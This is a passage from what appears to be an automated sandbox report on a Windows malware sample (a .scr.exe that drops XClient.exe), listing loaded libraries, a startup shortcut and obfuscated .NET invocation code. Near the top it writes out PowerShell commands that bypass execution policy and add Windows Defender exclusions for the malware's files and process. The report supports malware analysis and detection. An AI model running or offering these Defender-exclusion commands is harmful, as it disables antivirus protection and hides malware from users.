              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'THITWNSEI24112908089786756456545346568789-00010.scr.exe'
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: mscoree.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: profapi.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: XClient.lnk.3.drLNK file: ..\..\..\..\..\XClient.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: cxFT.pdb source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, XClient.exe.3.dr
              Source: Binary string: cxFT.pdbSHA256 source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, XClient.exe.3.dr

              Data Obfuscation

Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.V5iefvrq5ojDNrXhTMMo4zwFWo7bRXWxOZCqoGeeUpQmix0ckylU4EMAyEK5rzrqFBO4vVj,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.GFSxJ5J90XVIk,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq._1CGKpY5HgwGOF,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.u4082n7RFaVyO,_3QiiXqkghrMk1.Ds6pGCLI6znqx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{mJgaCaREgzuBt[2],_3QiiXqkghrMk1.BvKeDBBOxQxE8(Convert.FromBase64String(mJgaCaREgzuBt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { mJgaCaREgzuBt[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.raw.unpack, 4QBfyOitSe4w0.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.V5iefvrq5ojDNrXhTMMo4zwFWo7bRXWxOZCqoGeeUpQmix0ckylU4EMAyEK5rzrqFBO4vVj,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.GFSxJ5J90XVIk,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq._1CGKpY5HgwGOF,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.u4082n7RFaVyO,_3QiiXqkghrMk1.Ds6pGCLI6znqx()}}, (string[])null, (Type[])null, (bool[])null, true)
